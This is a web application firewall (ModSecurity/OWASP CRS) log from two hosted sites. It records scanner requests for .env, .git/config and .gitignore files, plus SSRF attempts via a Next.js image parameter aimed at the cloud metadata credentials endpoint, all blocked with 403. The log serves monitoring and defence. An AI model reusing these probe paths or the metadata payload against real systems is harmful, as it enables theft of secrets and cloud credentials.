[Mon May 11 17:35:44.012025 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.gitignore"] [unique_id "agH3UA-Qm4vhlWBPlMjSfAAAAAw"]
[Mon May 11 17:35:44.012223 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.gitignore"] [unique_id "agH3UA-Qm4vhlWBPlMjSfAAAAAw"]
[Mon May 11 17:35:44.015642 2026] [security2:error] [pid 1416109:tid 1416147] [client 195.178.110.155:14538] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "missmandarine.com"] [uri "/_next/image"] [unique_id "agH3UFV4kyjgo4bQBUhuGgAAANE"]
[Mon May 11 17:35:44.016635 2026] [security2:error] [pid 1416109:tid 1416147] [client 195.178.110.155:14538] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/_next/image"] [unique_id "agH3UFV4kyjgo4bQBUhuGgAAANE"]
[Mon May 11 17:35:44.042004 2026] [security2:error] [pid 1411055:tid 1411067] [client 195.178.110.155:14574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWlgAAAQo"]
[Mon May 11 17:35:44.088268 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UA-Qm4vhlWBPlMjSfAAAAAw"]
[Mon May 11 17:35:44.096300 2026] [security2:error] [pid 1411055:tid 1411057] [client 195.178.110.155:14490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T0WKUxpmnkK7zHyWlQAAAQA"]
[Mon May 11 17:35:44.097552 2026] [security2:error] [pid 1411201:tid 1411265] [client 195.178.110.155:14414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UPy_GXSWIKeli0sNGgAAAJQ"]
[Mon May 11 17:35:44.097885 2026] [security2:error] [pid 1412074:tid 1412080] [client 195.178.110.155:14536] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UDJnyuKVXoStDhbOJQAAAEQ"]
[Mon May 11 17:35:44.105121 2026] [security2:error] [pid 1416109:tid 1416133] [client 195.178.110.155:14438] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T1V4kyjgo4bQBUhuFwAAAMM"]
[Mon May 11 17:35:44.113315 2026] [security2:error] [pid 1411201:tid 1411254] [client 195.178.110.155:14590] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3T_y_GXSWIKeli0sNGQAAAIg"]
[Mon May 11 17:35:44.119399 2026] [security2:error] [pid 1412074:tid 1412095] [client 195.178.110.155:14556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UDJnyuKVXoStDhbOJAAAAFM"]
[Mon May 11 17:35:44.122711 2026] [security2:error] [pid 1411099:tid 1411114] [client 195.178.110.155:14452] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UA-Qm4vhlWBPlMjSewAAAA4"]
[Mon May 11 17:35:44.173731 2026] [security2:error] [pid 1416109:tid 1416147] [client 195.178.110.155:14538] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UFV4kyjgo4bQBUhuGgAAANE"]
[Mon May 11 17:35:44.276195 2026] [security2:error] [pid 1416109:tid 1416147] [client 195.178.110.155:14538] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "missmandarine.com"] [uri "/_next/image/"] [unique_id "agH3UFV4kyjgo4bQBUhuHAAAANE"]
[Mon May 11 17:35:44.277073 2026] [security2:error] [pid 1416109:tid 1416147] [client 195.178.110.155:14538] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/_next/image/"] [unique_id "agH3UFV4kyjgo4bQBUhuHAAAANE"]
[Mon May 11 17:35:44.341134 2026] [security2:error] [pid 1416109:tid 1416147] [client 195.178.110.155:14538] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UFV4kyjgo4bQBUhuHAAAANE"]
[Mon May 11 17:35:44.360596 2026] [security2:error] [pid 1424905:tid 1424932] [client 195.178.110.155:14442] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "missmandarine.com"] [uri "/_next/image/"] [unique_id "agH3UIW8yzYoWG_eyCWvOwAAAVg"]
[Mon May 11 17:35:44.361313 2026] [security2:error] [pid 1424905:tid 1424932] [client 195.178.110.155:14442] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/_next/image/"] [unique_id "agH3UIW8yzYoWG_eyCWvOwAAAVg"]
[Mon May 11 17:35:44.367321 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3UA-Qm4vhlWBPlMjShAAAAAw"]
[Mon May 11 17:35:44.367517 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3UA-Qm4vhlWBPlMjShAAAAAw"]
[Mon May 11 17:35:44.423164 2026] [security2:error] [pid 1424905:tid 1424932] [client 195.178.110.155:14442] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UIW8yzYoWG_eyCWvOwAAAVg"]
[Mon May 11 17:35:44.424877 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UA-Qm4vhlWBPlMjShAAAAAw"]
[Mon May 11 17:35:44.442941 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env.local"] [unique_id "agH3UA-Qm4vhlWBPlMjShgAAAAw"]
[Mon May 11 17:35:44.443115 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env.local"] [unique_id "agH3UA-Qm4vhlWBPlMjShgAAAAw"]
[Mon May 11 17:35:44.507392 2026] [security2:error] [pid 1411099:tid 1411112] [client 195.178.110.155:14422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UA-Qm4vhlWBPlMjShgAAAAw"]
[Mon May 11 17:35:44.581477 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3UPy_GXSWIKeli0sNIwAAAIA"]
[Mon May 11 17:35:44.582026 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3UPy_GXSWIKeli0sNIwAAAIA"]
[Mon May 11 17:35:44.643765 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UPy_GXSWIKeli0sNIwAAAIA"]
[Mon May 11 17:35:44.662243 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3UPy_GXSWIKeli0sNJAAAAIA"]
[Mon May 11 17:35:44.662413 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/.env"] [unique_id "agH3UPy_GXSWIKeli0sNJAAAAIA"]
[Mon May 11 17:35:44.720900 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UPy_GXSWIKeli0sNJAAAAIA"]
[Mon May 11 17:35:44.740489 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agH3UPy_GXSWIKeli0sNJgAAAIA"]
[Mon May 11 17:35:44.740762 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agH3UPy_GXSWIKeli0sNJgAAAIA"]
[Mon May 11 17:35:44.802843 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UPy_GXSWIKeli0sNJgAAAIA"]
[Mon May 11 17:35:44.822512 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agH3UPy_GXSWIKeli0sNKAAAAIA"]
[Mon May 11 17:35:44.822703 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/api/.env"] [unique_id "agH3UPy_GXSWIKeli0sNKAAAAIA"]
[Mon May 11 17:35:44.882013 2026] [security2:error] [pid 1411201:tid 1411246] [client 195.178.110.155:14466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agH3UPy_GXSWIKeli0sNKAAAAIA"]
[Mon May 11 17:35:44.902097 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agH3UPy_GXSWIKeli0sNKQAAAIE"]
[Mon May 11 17:35:44.902364 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.git/config"] [unique_id "agH3UPy_GXSWIKeli0sNKQAAAIE"]
